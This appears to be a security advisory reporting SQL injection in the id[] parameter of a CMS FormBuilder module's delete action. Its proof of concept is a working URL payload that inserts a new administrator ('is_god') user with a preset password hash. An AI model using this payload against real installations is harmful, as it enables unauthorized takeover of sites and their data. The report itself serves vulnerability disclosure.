Description

When deleting submissions which belong to a formular (made with module FormBuilder), the parameter id[] is vulnerable for SQL injection.

Proof of Concept

• Call the URL

http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete

• To test this URL successfully, you need a valid formular and some submissions to that formular. You might have to adjust the parameter form_id to another value.
• After calling this URL, you have a new entry in users table.

Impact

The attacker can tamper data in the database as they want.